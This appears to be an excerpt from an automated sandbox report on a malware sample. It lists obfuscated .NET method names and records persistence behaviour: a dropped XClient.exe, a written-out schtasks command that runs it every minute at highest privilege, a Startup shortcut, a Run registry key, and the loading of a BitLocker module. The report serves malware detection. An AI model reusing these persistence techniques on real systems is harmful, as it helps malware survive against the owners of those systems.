                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _B3pIPS2zbFb0oPCNp3nzdzF2L2G.csHigh entropy of concatenated method names: '_TXhGVWutDbZlT7v8D3GD8nmA0nI', '_hbg6lXjAKu9dRccrXHQg9jiKfA1', '_zRFNTphRwnjH8BYLi9n5TNPwZZE', '_U3kXfiDrLzMBNVJlLwXrKGsuHMr', '_Loy7npXGNgD2Sg8cGl5HDv5GI0G', '_WObKgq2AQE55qnEILOEnj7SlkKm', '_OvBUimdMSvo4u9vixUtxiF052fC', '_RkGdd0t649hDYp9XDQUAG7ADqOJ', '_cBh9Tnrt48030iQTwSzy2XoVaTJ', '_3pEtQkJRikMYcFK4ZigN5Sftt7H'
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _MCoeqqdngTUKYixysZLvA5boVOH.csHigh entropy of concatenated method names: '_sA2BEerVDy0XOL5LSYq50YRDfHQ', '_A7TuQiUySyqOpo7zjK8n1GhVmRB', '_UMNIctJTt4Y8OpcL0kUBsTK5n3e', '_dl3SVRooKsTkF9pZyU4Gn44xzjd', '_zzaOa9ZItaUaxALXe6UBfNZ86V', '_sVFgMq5wDg5ajnKcqBcHmwNswmx', '_SaonJNyaOC7F4dUC58gIChA8iIC', '_NvWcVwjjULtly7gGCB7mcZbypXH', '_IVgDgaYaNAdWi6YhlHCma05Tobab', '_QgEJRS6Kfwogw0NSmemDbLqE4PG'
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _oSxW7ZqB2IhF2MsgBR6tDK21SWb.csHigh entropy of concatenated method names: '_hT0TwYDaicqp9rhKx2ks2Be1GDk', '_ZKePOkEE6yjTinUcMfjUYxODzds', '_PNDNYiQSgC1wlhVGyenkgAtPsch', '_WE7OgWOetdH9zVAYuezkIgYHgbd', '_SCUxhivdGrzcUZMjh2fZohkvxHB', '_QONRYIM1WI06qldj55LVn5sBJqD', '_TgJFbK4EhpjpZJWcilXUGmXFZ8v', '_n4b0OPPbGXmzOyPg9jCakCRNRn5', '_NZW2DRC20tKalrhpYGnQMEyFoTA', '_bFmMWUMaHcQk0LlDmF4PvwIHqxo'
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _XpaqA6dy7DLL5AVKehcnCQmix9.csHigh entropy of concatenated method names: '_EPfYJrRHuL29bp4Jj6ZA31gJGID', '_dl3SVRooKsTkF9pZyU4Gn44xzjd', '_IsSJ5sbKpWb6mvQr20VMIBO859G', '_NvWcVwjjULtly7gGCB7mcZbypXH', '_IVgDgaYaNAdWi6YhlHCma05Tobab'
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _nAZZxBDgYAcXzBPdN1rAp9VNEKU.csHigh entropy of concatenated method names: '_EPfYJrRHuL29bp4Jj6ZA31gJGID', '_pinewcdRXSu0Vpnuf2emt4E79kC', '_dl3SVRooKsTkF9pZyU4Gn44xzjd', '_IsSJ5sbKpWb6mvQr20VMIBO859G', '_koxlkFK8qm2bhYVnDXP5fgfwd1K', '_NvWcVwjjULtly7gGCB7mcZbypXH', '_n5bJySpFGzn2z8y7FPf4vDwyDaH'
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _Am7vNeE0E2skuwMcUYRO4jJPkKF.csHigh entropy of concatenated method names: '_NWFCVQ0xES8ncSsIr0nhMoNAY05', 'GetEnumerator', 'GetEnumerator', 'MoveNext', 'MoveNext', 'Reset', 'Dispose', '_YONHkgICSi5cBP9tDhqfTvPizXBA', '_pQwbcDMNcm4Wh27LjyC93MF7h6ab', '_twdcdspGlgSb7kFjieBBwGRBv6lb'
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _qEiB2PxM7fl0KgAMaSiv9IFJkQI.csHigh entropy of concatenated method names: 'Resolve', '_IVgDgaYaNAdWi6YhlHCma05Tobab', '_f9F0TbrBjrQrEYQ9lziF3B3Hyu', '_f9F0TbrBjrQrEYQ9lziF3B3Hyu', '_1RitYdUenvIKfGQB8abHeBPLIHI', '_ib8xob8JeoUaUnLC7ZtdKVMyftz', '_dW9aBPiAXn9ic1TaDEKah4u16Ok', '_wHMBmOBExhFSuNdtkLiijhcaVB3', '_YivSNfTqC9xEqKVqtAeBDdXhz6c'
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _KNhDcYhhDJCMfFOkLPRoDU4h6nq.csHigh entropy of concatenated method names: '_KGmPWSFGeDtkQxXUuo1p9emhzpf', '_DYGH8r1GQjsOFXTTQMis6n0Po7C', '_qKh7l1F6lxU8s86eXOfcMeLcWoM', '_IeHW2CNgU31D7HJQZ4xhRU1WBoC', '_qKh7l1F6lxU8s86eXOfcMeLcWoM', '_IeHW2CNgU31D7HJQZ4xhRU1WBoC', '_qMaqDTNyV6zOl9gfd4pB8f4dUZg', '_96RzWcCfbbZpgpW8DKcPRDe0U3c', '_Mi8JTGgUa0SB1TYcdtUerD94K4t', '_Mi8JTGgUa0SB1TYcdtUerD94K4t'
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _PsYuEQYWCnxcpMeyc6gDRRziRcx.csHigh entropy of concatenated method names: '_hT0TwYDaicqp9rhKx2ks2Be1GDk', '_hT0TwYDaicqp9rhKx2ks2Be1GDk', '_ZKePOkEE6yjTinUcMfjUYxODzds', '_ZKePOkEE6yjTinUcMfjUYxODzds', '_PNDNYiQSgC1wlhVGyenkgAtPsch', '_PNDNYiQSgC1wlhVGyenkgAtPsch', '_WE7OgWOetdH9zVAYuezkIgYHgbd', '_WE7OgWOetdH9zVAYuezkIgYHgbd', '_SCUxhivdGrzcUZMjh2fZohkvxHB', '_SCUxhivdGrzcUZMjh2fZohkvxHB'
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _8g2Vgt5sE5c3QrRE9u9qqBvQFAB.csHigh entropy of concatenated method names: '_0TxAA5fN5GRPJgZw54CYnOwg1Ed', '_hbg6lXjAKu9dRccrXHQg9jiKfA1', '_H6ugls6NtmkKagakiXNmyYAYprl', '_RkGdd0t649hDYp9XDQUAG7ADqOJ', '_NcKeUAfdxkJF7ZAXRfkKrvlg5Il', '_XxlDASRA8wRf1RrNaDnqsgiCSxQ', '_7JRjJNN6MZo2n59b2601xeNNWGh', '_ev69c68CpMsOhi0ejVh8w7EbDCZ', '_gFUDcFaEVFRI9BYaYzIdg1y6hdgb'
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _iIu2h1carILI1mKN95bpWbjCJTO.csHigh entropy of concatenated method names: '_wvYVb8uwSs6FEbnBmq4qVaj58CP', '_wvYVb8uwSs6FEbnBmq4qVaj58CP', '_wf502nrUVMHQfaE3DYGeaEIhdow', '_wf502nrUVMHQfaE3DYGeaEIhdow', '_3DRYVGGANHnoru2yAM1qXkuXK4A', '_e8OGWE7WMTYz6z9YnPWDqKLmIG', '_3DRYVGGANHnoru2yAM1qXkuXK4A', '_ahL1Cb9LIImTB4BJWVB9lO7NWRY', '_Cr8oPr3E2i2hMTdbqjEj3fp0GgL'
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _UDo2fe8aKTaRRzTrY7dfyyzctlF.csHigh entropy of concatenated method names: '_pHbBMH65YHSLNd6FgmOuTXLfGdG', '_3DRYVGGANHnoru2yAM1qXkuXK4A', '_PYdxYgJVwTq72Nq1r2Dba96V34d', '_PYdxYgJVwTq72Nq1r2Dba96V34d', '_wf502nrUVMHQfaE3DYGeaEIhdow', '_ahL1Cb9LIImTB4BJWVB9lO7NWRY', '_KyZ4OqmVzCWmdCJgisMcew2fdzy', '_UGctTp6qCvnd2MaVHDT1xydOuhP'
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _ZxwNLuKZAq7P1uYpOkw8KgQWD4e.csHigh entropy of concatenated method names: '_ZOT8WVXLdNFGWzgedE7JHXttw8l', '_rkhaQS6fqijg8cztFSyDPYGjrfxA', '_2Q7fn2GOo9O0Xglchik2xT9eoRu', '_rLQ1QFSotASwWwZ0Ew91Ilfr1', '_DquCk9okS2O7TWZoVIaqjc3h6lL', '_XloYTL56m4NA74d8wrONONNsZ2L', '_H0zzDQDeeF77mG1ueGD1h5MKtCt', '_esEwYMLDDyWZlxgwQHjqhYwP1Pj'
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _GCCLOADV5CuHbloPeMKCoGXcVhJ.csHigh entropy of concatenated method names: '_hECdJMxZsUzSZPNFMdIKizfJer6', '_pHbBMH65YHSLNd6FgmOuTXLfGdG', '_B5gLcePIerG79yUydgednyLAP09', '_3DRYVGGANHnoru2yAM1qXkuXK4A', '_PYdxYgJVwTq72Nq1r2Dba96V34d', '_PYdxYgJVwTq72Nq1r2Dba96V34d', '_wf502nrUVMHQfaE3DYGeaEIhdow', '_ahL1Cb9LIImTB4BJWVB9lO7NWRY', '_jz6WK95jm27SBubP0hIAEWtaGfw', '_KyZ4OqmVzCWmdCJgisMcew2fdzy'
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _WNccKrBf3JDSSgsEFuszZBwbfaKA.csHigh entropy of concatenated method names: '_WuriskiX2RD3p6sths43Pv9HrMg', '_2Q7fn2GOo9O0Xglchik2xT9eoRu', '_rLQ1QFSotASwWwZ0Ew91Ilfr1', '_fogFYDigAbDFmdEcG3NyFUijGeK', '_fogFYDigAbDFmdEcG3NyFUijGeK', '_yXEXlIBlC2cJAOpHc4xoIJ42q4F', '_N3v0PaTLbaTJLy8864MhjAbqXoF', '_IDdT9AqliggahYzv2UAi5rf9Bar', '_9qqnleF1C8RUluSNvy52BUzh9kB', '_NNByr7sbWC9VMxYWwoGDW9D5Doj'
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _0PXsslYYteePQejChIiEuhBlWiI.csHigh entropy of concatenated method names: '_EPfYJrRHuL29bp4Jj6ZA31gJGID', '_dl3SVRooKsTkF9pZyU4Gn44xzjd', '_IsSJ5sbKpWb6mvQr20VMIBO859G', '_NvWcVwjjULtly7gGCB7mcZbypXH', '_IVgDgaYaNAdWi6YhlHCma05Tobab', '_yRmzuM7OGCaaqQwzqICoLATgcpF'
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _ndzHu5MY78YZilR6wWBdfecAnRe.csHigh entropy of concatenated method names: '_WuriskiX2RD3p6sths43Pv9HrMg', '_WuriskiX2RD3p6sths43Pv9HrMg', '_2Q7fn2GOo9O0Xglchik2xT9eoRu', '_2Q7fn2GOo9O0Xglchik2xT9eoRu', '_rLQ1QFSotASwWwZ0Ew91Ilfr1', '_rLQ1QFSotASwWwZ0Ew91Ilfr1', '_fogFYDigAbDFmdEcG3NyFUijGeK', '_fogFYDigAbDFmdEcG3NyFUijGeK', '_fogFYDigAbDFmdEcG3NyFUijGeK', '_fogFYDigAbDFmdEcG3NyFUijGeK'
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _UcfWioMA7WSWoaaGk0GFJ3vkB40.csHigh entropy of concatenated method names: '_DVW5UcwzMxx9VVNnzuFQCAtCGoI', '_wOF3FnWQiupSRHHrLMI57B3IZAf', '_WL2Wt3pYWaHoSszDT1O3leSCybI', '_8PGbCQSmto0Nv0pRj0mQPoXpxpN', '_AAKcWThIt8SteDoTrie5DTwHm2D', '_8JRlIddhCOTV2DFEsbDaZlUT3ym', '_N30jLAiKlhaNziK4k4KWOO8fiJG', '_OMBgnO3mhLWVPlWPxwCfFimwR3b', '_uhLkCFQjl2kBCrxxbdbpscbNzHF', '_5HYDk2TNhQZwdm25LbjlqntwHpm'
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _gpHpTlui25gjBZUXbSwiwcaBpiI.csHigh entropy of concatenated method names: '_EPfYJrRHuL29bp4Jj6ZA31gJGID', '_dl3SVRooKsTkF9pZyU4Gn44xzjd', '_IsSJ5sbKpWb6mvQr20VMIBO859G', '_NvWcVwjjULtly7gGCB7mcZbypXH', '_IVgDgaYaNAdWi6YhlHCma05Tobab', '_yRmzuM7OGCaaqQwzqICoLATgcpF'
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _ZOy5oOpEkshs3Y1JifVJJb45BYG.csHigh entropy of concatenated method names: '_Q1xkDB6BmjMED1V1EhbfPIp6ORR', '_Kt24jXJqdCKiH3TpjsSVhH4wwri', '_gly5AnUJaha2LOoFhajPVyM83yU', '_OtWzqUTrOWGsvAdmRYzerFvQNiE'
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _JdWBA2N8ekPskCVnqssgR2ydBDh.csHigh entropy of concatenated method names: '_IDvRS9IHtppAci6Mu7TsIAaDYKK', '_IDvRS9IHtppAci6Mu7TsIAaDYKK', '_IDvRS9IHtppAci6Mu7TsIAaDYKK', '_l47XcHOF24yFN1Ld2WSiwPcg9Fl', '_l47XcHOF24yFN1Ld2WSiwPcg9Fl', '_l47XcHOF24yFN1Ld2WSiwPcg9Fl', '_B8ruZk0d5P0YPvpZtcw6pI7tGRC', '_B8ruZk0d5P0YPvpZtcw6pI7tGRC', '_B8ruZk0d5P0YPvpZtcw6pI7tGRC', '_h8zQkPdOPUNfKIdlW2aMXi8zIzF'
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _1Rx2JzALMUPoaFlfIQEiJ4J6V7.csHigh entropy of concatenated method names: '_b2SGLNr8A2qLjDW2wpm1x0gobCH', '_pQ8fZUaDqzBgPd8CfdAkNoNNBcM', '_dl3SVRooKsTkF9pZyU4Gn44xzjd', '_OEuEF5oGyT2pIPUA5NOE8vkMnGl', '_SaonJNyaOC7F4dUC58gIChA8iIC', '_NvWcVwjjULtly7gGCB7mcZbypXH', '_IVgDgaYaNAdWi6YhlHCma05Tobab'
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _bQESfRKSxyHQZzI0wJyTfmpJSXf.csHigh entropy of concatenated method names: '_rP82NZjf04co6sfUVZkIKatMu9E', '_CfGAO2CujWXUX7jSVJjxlRUv0nM', '_BFmFlQuBo63fXbptT8yzcmQA0zU', '_YkL2sOyh6QYowJ6f7GYk4EvXhXd', '_O1GCjM4DELxpWie7ql4g8n0LBmH', '_OXt5X3LmrOjR5QybkfrTHIaHulE'
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _TE769jlN3Sx78iiT4oYDmj4d1ni.csHigh entropy of concatenated method names: '_EPfYJrRHuL29bp4Jj6ZA31gJGID', '_dl3SVRooKsTkF9pZyU4Gn44xzjd', '_IsSJ5sbKpWb6mvQr20VMIBO859G', '_NvWcVwjjULtly7gGCB7mcZbypXH', '_IVgDgaYaNAdWi6YhlHCma05Tobab'
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _Z2a8Y4QPKSiA51bDLtmYRs4FjsU.csHigh entropy of concatenated method names: '_PladE2ZdAoM8sHhjbJZrbcmIJp1', '_twdcdspGlgSb7kFjieBBwGRBv6lb', '_jz6WK95jm27SBubP0hIAEWtaGfw', '_PYdxYgJVwTq72Nq1r2Dba96V34d', '_U4tRg43J0DWb4Rlveeydb2lMuVq', '_Lcil5t6qScnCiUSScVzuCVLFMtH', '_wvYVb8uwSs6FEbnBmq4qVaj58CP', '_ahL1Cb9LIImTB4BJWVB9lO7NWRY', '_3DRYVGGANHnoru2yAM1qXkuXK4A', '_3DRYVGGANHnoru2yAM1qXkuXK4A'
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _QvytQQCahrSdx4LqknDwtFbTLLW.csHigh entropy of concatenated method names: '_8Furxdm4W8cOwM7pOZoerIuPFZ', '_UzlTypOEnIqof1INvLVgbwgIKpj', '_HIra9bS0qtbaBHTiZkfVzUc8HX6', '_1I8BJ1cEUkvUW5kDfIxB9qOIUaY', '_WcXUpgxwZ1OfMP2zdIlHhhsduMm', '_p4hOG6SYTq1KKNMNpZNrtL28knB', '_PZUFQbxjy80kiK74UgJJGS9AaRk', '_5HjhNSAScxjbtmhXUmwWzacUrEN', '_YKQwXSA6tblBAhdtlyB3AUJb1oA', '_p5p1WjuT6uZarDOXjQlEH5DHOYp'
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _GeU3kdshZShgRm1iI6pinOwwxji.csHigh entropy of concatenated method names: '_B0ZcqvSdGNFoeJdhbQWHT0nyKGBb', '_R9jIDc3lQitb5PR8HxEetSJDUtiA', '_uPQEOgRhUdXBBQI1cRaHhYdJERP', '_4yiNh5YYwZCBgFMRyCYnCzODjKs', '_sWQ4YI5ZEFecHxGJcGvwKr0r2Kf', '_PY9oGnbsWgqzxCEuENicxcF9Yhb', '_OBn7io8Cky9XMBAgUQSErX6UtbV', '_gAEz4tAH26Ot7EIfDan0KYxx9PF', '_jcdrjuR7uyCGpQMaqaBXXKEK5kg', '_jcdrjuR7uyCGpQMaqaBXXKEK5kg'
                Source: 80c619d931fa4e5c89fe87aac0b6b143.exe, _g5IYOoU02jTkjC7VIdxbr0D1Vjn.csHigh entropy of concatenated method names: '_mGK0Y2tapgjAHisBuF0c5nIgkJIA', '_hbg6lXjAKu9dRccrXHQg9jiKfA1', '_3pEtQkJRikMYcFK4ZigN5Sftt7H', '_DCeXfmcdLyGKsVz0hpzkKowUVzI', '_6UigFhhy2I6ploFMtQCMzV33qIf', '_E9Exw0kY65KbSb4ephBKe8bh50c', '_7rr4WeALGgCQk5RLIi9c0NCEEZp', '_p0isDlNgwU1rKu5AldviCcIvHri', '_pQwbcDMNcm4Wh27LjyC93MF7h6ab', '_XxlDASRA8wRf1RrNaDnqsgiCSxQ'
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpack, lTcba5iWSrQ.csHigh entropy of concatenated method names: '_69crcUaWQXR', 'r5CEwvp725B', 'xJOvaT9nS8v', 'jvpD1JBFZB4Ugfqcc6B1RqpN4xVb', 'f0PCNZGwFfq4tX2dGKXvXS4ymkON', 'akJ6vPgKYMegAYXAUZVHPliU47Nh', 'LOgIbaU6WN9Uj1sRpin1NyefuOBC', '_742O0EiUd5U4PUD9Hv1VRvlp4aWE', 'Qrp0BqMDPZ3cx5pZIEZ55fEwBihQ', '_3v2y7qVDfEBwMkf5zXIhXJe2jBTs'
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpack, hFUoV0a7S1kALEYtQhVCbAkdQuzvjxpV7Zr2kNoO8ZeRonDhf2KvdocanDuH7qp67fCk.csHigh entropy of concatenated method names: 'lAuGAdmyuVwyP7tDZnK6T30bjJ7cFVUZWOOc3oBK8iyW2QH9Stkfp6WUd0eDJ2aGYYYq', 'D1XRMri1VYKH9rnc40sJ4tQBMRdGNSQlX4aaGIWG1AAlPpBefMsF5S0LywRjKl60NTHo', 'BKD9I1fcC7r3FjG4ZJF2iHIDEdJFc7N07kzz3dtfeaYIwjesvxfhRZ3yRMM5cy8tlKHc', '_8TiMH470jHC6vEaWDU2VNUHTzRDwtBoO8S9OoEfKgBSg1KnX7LhNeO9oCvNh3Qp5gTs6', 'b5bdM1mdXQHPwDM5EcfwwABEpyLiUjBPznyOBe45GPtyja2zkjbWFT165lhKorooMWLl', '_61FqiRfy1ErpqcrfN1SWdNVdqZnI63IuIGMReKrgUXmF7XeJh9D0FyKOVpojgwjUAjU9', 'zDw6Ghmcn9XUqWtVV4lIvF6qNzJPwd9bvnxxbBXgJ9ZSiquyGBmrgV6PA8fbrVYQuf7p', 'QpcLryoYpLYFzJ6MuFtA0rnIXDlQruyj8vUdHgZBY9e5KBOf5fzg2590HX78TYTbyUqW', 'sl1CYZWFs8yOQinCCbqIlDNRCgTUTHjM1DLACYqi3pLz82Kse788XYZUFnPY8YsllRYc', 'AWyC2o3JYwb9lJVEmYypo5kNTihEN9TJgPU0lZnx94DOdjGhtONWpzdQjbTF8p9Z7V0K'
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpack, ZNCRKfdz0LuicdFm6AEfaoD0tATclNvsedfpXpQ6erDAzlgg9KmDsGNR6wFdaevSX9Ew.csHigh entropy of concatenated method names: '_0Mm7Aeov9ZfWWzuYM5imBmy2sfrEzQIC7BbAhaHfhjp9OTdfAUAr6fpLmPdAbG3jxuEr', 'iNJxCmfyBzXXpSEUbwSbgn41FRjRtVYAU45ez4okX1BhvtHHxAUaOLNbUT54vUZmOLoy', 'TfaMNFdXzLG432J18Ucs8sLAfJK9tsZsMNcxOmDLEOFyS8JkFKiSZdWWv6P0An20ZsHq', 'BT330vM7DBcLhE06reS6jAKCIuoypnq6LrQn96gn2mrUzXMQGKMKp6L0dBWVwh5QtPc7', '_33zmQDYhCT0aBR1Be8IZQqvl3JNcmWuOb3BuYwBG4e3tSYIQ4Iro02CSBkkyXL1NKkjn', 'nvUZdNaoRWv3sSaYPUr91uaHSptAriBktXEBlnhqqcDNBjbW93AXqqV2r69Dni1OkUvc', 'UPAYVOQ3YNM7qX8BtJEn9ZoB0dT0AwIwhjFwop7dOUUFS1hWvpImuhBSE1irzbXsj9lZ', 'Z4FYhvTITwGDkKLn3XNPYmiMZRG2E91pblOIDuIZc9Q3ez8EFnqVBlQx3QgBJZ2XsG8a', 'fquKA482MaIQMsOkM9qmJ8WNWxWcQpyQVbxhGzxQu2EGtpwaaaK7cznACsKNxKSELbhO', 'FSwoNsPj4JJh72yBOikPnsOcYRrRtvUkHxPkVusgqz1a3yrIKCWKIBU2vAnzBooL6kol'
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpack, HvJ0wcF50Vb3wdtNXSCL2mhxsmyYMQJjgg9uN8aiEWuLIQLhJmqlzcaCcoibs4eIzCGM844v4e79K8ncQ5X.csHigh entropy of concatenated method names: 'tgkffKwg3UfRlIBCxQ2zuhYYKAUHGXH9X36kwuu2BTvua6CJVR1az9lye3ytTY93hnIfg6HLKOttcQg9Ell', 'AXwWCWnGwjflpzPcamFpvDdGD8N59FdnOe68QG5fov7flQM8iT5NgTA1FzrNqy50OajUsFNBPEpTUoOXp78', 'ZOIFq3jk6WIyeQ2FPBCSnlCq3qoxhf5L5zdI4QvyBakuNjxk5BjuMFg1gb1CyXY8wNWPbzjHolQQ8dhdjqa', 'Mc7T12YOmeTPLgkTlqwfAY2GKobT6AUgE4zFo3CaTVNo6hgIOFGav2rWGvAxZNDikJRc8JIQ8doxxma080Z', 'ZmcpiQNY7DksXeR0hA1OITtGVApOMjxg0AEY6YKYoH0rcMyCeix2UQlvWzaj2W1rbpaUYErguFFzVPqOp9X', 'OCtuM78nwgJKgDW9xtu29soRXCP4CG2AAxWLZ84pvqfAvFbLU8PyOAbrjzrq1RULU463gL20gaLFwCMHE5p', 'EbRC02rHV7jYujcRRX0a2DlM6k2gwsENcQePXlwFKgX6ShiX0UjgRwYz23UdeUBhmnF4jk42kw3MnRoan2W', 'OF3EYaJ5l4oruWrsYXmGnWP789aTfIlrIleXyyQ9e79NPEN5qo4gYgA90Hs7pM0xCYzlSVpWSDS9jy8MlFJ', '_9xjLOm0IdXOVvP4WMISi1gnBNh1ic8cTA9ikCy9xGhuen6Ae8WvLP1qaA0qBux9ZyB5QJNrPlNi6WfonqYl', 'EKLKzr4EdRQLtHtXxCSHQ1jZ3ZZy1Hbk02zW04HNGkY0FcYlK6sAFe2Vczf1Xly2vCWrP5P3CtaiRhjXhVZ'
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpack, LyW2UwP6lJFaVVXtBBEeZb3S3BVzdPklqgdfATSqrd9NFPTVzBDLmDtAIksdgyicKtcH.csHigh entropy of concatenated method names: 'JQn8rNz0vWem971mprtz6QeVSi4EWwNZIhsf5XUPeHnBF3oMCUtFeGrl7SiEFYgf5eA0', 'jfyWaSeLui23jadTPGgt13k8b8DHW1FU00AU5PgsNY3Ean7zOjw3DrT3dUFh5QHx3QyG', 'X0uNmNjAx3dAIJ5E1yG4r3QeN78PZQnOYdLz71cFVxQwsYKhEwaCfjU3Mb0u2s5gzsHp', 'MGH4nqKkMwIfrFx0YsSvzR8dzMRd', '_72w42FzmGqvuMEvSCjj15HyZKQZs', 'ALSDKpIu6q7yvFKqsQcgAkHQGz3E', '_7T2yEPUPM3LuCRZ5ainOOgRuk0iL', 'Cpm8IflLAvmOZx0NtrLpfp7Z9bEl', 'U4JdP1jrxzlMMqbn2S466MjKnia6', 'm3QDpuWUpBzfDSvqYRrSs4lf8Rkf'
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpack, R1oFIDa6Sxp.csHigh entropy of concatenated method names: 'a5FVtlro9Qa', 'yfLReO5cZiI', '_78mxZ4Hia2I', 'QJp98hZNfiY', 'kgLLdmJM5aq', 'XZx5lvwvxdF', 'wkYMkn9EJ8C', 'Z2R1e5uBPO9', 'yCh7WEz79dD', 'ERlcFiQ1dBL'
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpack, 8p6HXdScgG9HtbiypsYXFTylqzHaB8HBRzjbVjvANmFRtdER72EcyGMsymqswAT6ss8itvpv0ItEsp6BlVX.csHigh entropy of concatenated method names: '_7a6bWYSUebRZjTMImJFEHIjbcaWeiInxvMSvtYeydwPUahlpyS2oELZBXzzaoDm2uxHRFouywsMSvPY6kut', 'woAHE823X6e7RoVG505B8HZR6I70MkLalN1e2o8tlMyVJdvyGHxjYLheUWc3VOrYIuGPTnmDL9pD8FxyNVz', 'ECm2zGLG0nSqhnU3SB8bPkzIGWmZd2FxBlyGypk77EnKveuld7BiyhcWS334b9SnH0ASIdCINSHFxQ4VQ8I', 'c5MzsWOPkLH1yaKCh6XfBP5yWXjZbJ8K3lNPgNiw55EvEmU4kztesTYdsu3h8Ad9kfgAdWr1VG9XKb56yIg', 'j7hjCdAF8mnt2VsKJEnrGlWtDbvJkFYpNKs1MrQBFMaYB13AzBBE8aErKiWSDM9JHHI6WxkiDo2JkDfK4Vk', 'iSSgvCHdyeUpR9nacYb8RUDw3d0trNK0VBRKI4oOUsjPZBTceB6G3nwX9ok3Ax3BVd4WyZu3JjdpKi0Z8xz', 'aufXL6RbzGwGnwQTKGV5x7mGAImdbWFdmG1RlBg57jLYohX5sGumRYxHSaLyF1o1VeTs7NgShgqBAe3gwSV', 'xlhunsu3sywZir9WHUUKdi423mVLcrLMW3XsYz0WbbstnPJdayWCkwLpIsobI1ZeaOFEVtQNrt7LnjovN6N', '_1VWFVVGvMMXz6cm6PAZf5GDwzjFv8eagET9C1qm8sXsvKvLSW00saeFP1x4xdhJYldPvCLzJbYL9vTklf0H', 'WGlHWXfWJbaXfXkqFK7Y7DmHKTAHNwDXiKr5qyt1SxCW85HFlcoQdPeRiBGgrVG1ZsXwJDYd8cmP5kujeXY'
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpack, Vb3pIUOBZAmEcjV8YPPXE44DoyxRWxP1hA4a88RDOCgdFWw3gLCPjzxGKS2kXrNQyTp1.csHigh entropy of concatenated method names: 'SKdoItqsTjK8DNtUmPWrs3SVGUyPhqbEuIKE0hxXNvKlXk0UHN2dMPdrJ2HLU1jfFPjS', 'z3OFRxlcMV7PPSJH2ezg8Z3kQqAP', 'graTmMVOlgrPjSeBpZsAN8q0Fxpd', '_41iOJzgw74YNJazuXWrXxEQG8Pp7', 'jmN6DjlI0FwNc4k3h4lPmHB9pyQ8'
                Source: 0.2.80c619d931fa4e5c89fe87aac0b6b143.exe.2881810.4.raw.unpack, LTng7HIt456.csHigh entropy of concatenated method names: 'yRlAIxnJI6s', 'oTSiGLCxqfC', 'iPjzcpb2r9y', 'wAUBhpzuSVH', 'gxYgEp47OIwmAuAZEhaZ5lSGBS3m', 'cJH3zvKv8wyOior72OkFQhV9MaJV', 'KhVZUluvQSy2Lu6xRZRpODN4Nnet', 'qQTJoQPfwgcbSGJj5FUtvPuV7T8U', 'duOlixYJF4R7EELYiPpSrNl4XdXe', 'PF5lB8iRhuZt3SLfKO6sz4mZ7g0o'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\XClient.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\XClient.exeJump to dropped file

                Boot Survival

                barindex
                Drops PE files to the user root directory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\XClient.exeJump to dropped file
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\XClient.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClientJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClientJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
